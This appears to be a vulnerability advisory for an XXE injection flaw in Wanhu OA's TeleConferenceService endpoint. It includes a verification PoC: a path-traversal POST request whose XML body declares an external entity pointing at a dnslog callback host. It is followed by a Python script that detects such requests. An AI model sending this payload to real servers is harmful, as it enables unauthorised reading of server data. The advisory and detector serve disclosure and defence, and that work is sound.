Wanhu OA TeleConferenceService XXE injection vulnerability
Vulnerability Description
There is an XXE injection vulnerability in the TeleConferenceService interface of Wanhu OA. An attacker can exploit it by injecting external XML entities to obtain sensitive information on the server.
Vulnerability Impact
Wanhu OA
Network surveying and mapping
Vulnerability Reproduction
Product Page
Verification PoC
POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "https://fep6kf.dnslog.cn" >]>
<value>&xxe;</value>
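A detection check for the request shape shown above, as an added example that is not part of the original post: it resolves the dot segments in the request path, and when the result lands on TeleConferenceService it reports whether the body carries a DOCTYPE and an external entity declaration. The function name `inspect_request`, the finding labels and the sample requests are constructed for illustration, and the callback URL is a placeholder.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

TARGET_SERVLET = "teleconferenceservice"  # endpoint named on this page
DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# General or parameter entity resolved from outside the document.
EXTERNAL_ENTITY = re.compile(
    r"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def inspect_request(request_target: str, body: str) -> list[str]:
    """Return findings for one logged request; empty list means not flagged."""
    raw_path = unquote(urlsplit(request_target).path)
    # Collapse "." and ".." segments so the path is compared in resolved form.
    resolved = posixpath.normpath(raw_path)
    if resolved.rsplit("/", 1)[-1].lower() != TARGET_SERVLET:
        return []
    findings = ["reaches-TeleConferenceService"]
    if ".." in raw_path.split("/"):
        findings.append("dot-segments-in-path")
    if DOCTYPE.search(body):
        findings.append("doctype-in-body")
    if EXTERNAL_ENTITY.search(body):
        findings.append("external-entity-declaration")
    return findings


# Constructed sample requests (target, body); the URL is a placeholder.
SAMPLES = [
    ("/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService",
     '<?xml version="1.0" encoding="UTF-8" ?>\n<!DOCTYPE ANY [\n'
     '<!ENTITY xxe SYSTEM "https://callback.example.invalid" >]>\n'
     "<value>&xxe;</value>"),
    ("/defaultroot/TeleConferenceService", "<value>room-12</value>"),
    ("/defaultroot/login.jsp", "user=alice"),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(target, "->", inspect_request(target, body))
```

Matching on the resolved path rather than the raw string means the check still fires when the servlet is reached through a different prefix or with percent-encoded dot segments.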
This post is licensed under CC BY 4.0 by the author.